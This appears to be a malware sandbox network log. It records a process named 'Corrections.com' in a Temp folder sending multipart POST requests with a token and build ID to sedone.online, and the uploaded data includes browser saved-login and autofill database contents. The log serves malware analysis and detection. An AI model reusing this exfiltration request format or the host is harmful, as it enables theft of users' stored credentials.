2024-12-15 19:47:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49767	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:53 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----YU3OPPZC2VAIM790RI5P User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:53 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 59 55 33 4f 50 50 5a 43 32 56 41 49 4d 37 39 30 52 49 35 50 0d 0a 43 6f 6e 74 Data Ascii: ------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------YU3OPPZC2VAIM790RI5PContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------YU3OPPZC2VAIM790RI5PCont
2024-12-15 19:47:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:53 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:53 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:54 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:56 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------ZCJMOPPPH4EUAIEK6PHLCont
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:56 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-15 19:47:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49769	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:56 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:56 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------ZCJMOPPPH4EUAIEK6PHLCont
2024-12-15 19:47:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 15 Dec 2024 19:47:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-15 19:47:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49771	116.203.12.241	443	5496	C:\Users\user\AppData\Local\Temp\628056\Corrections.com

Timestamp	Bytes transferred	Direction	Data
2024-12-15 19:47:59 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----LN7YM79RI58QQI5PHDBS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2024-12-15 19:47:59 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4c 4e 37 59 4d 37 39 52 49 35 38 51 51 49 35 50 48 44 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 37 59 4d 37 39 52 49 35 38 51 51 49 35 50 48 44 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 37 59 4d 37 39 52 49 35 38 51 51 49 35 50 48 44 42 53 0d 0a 43 6f 6e 74 Data Ascii: ------LN7YM79RI58QQI5PHDBSContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------LN7YM79RI58QQI5PHDBSContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------LN7YM79RI58QQI5PHDBSCont
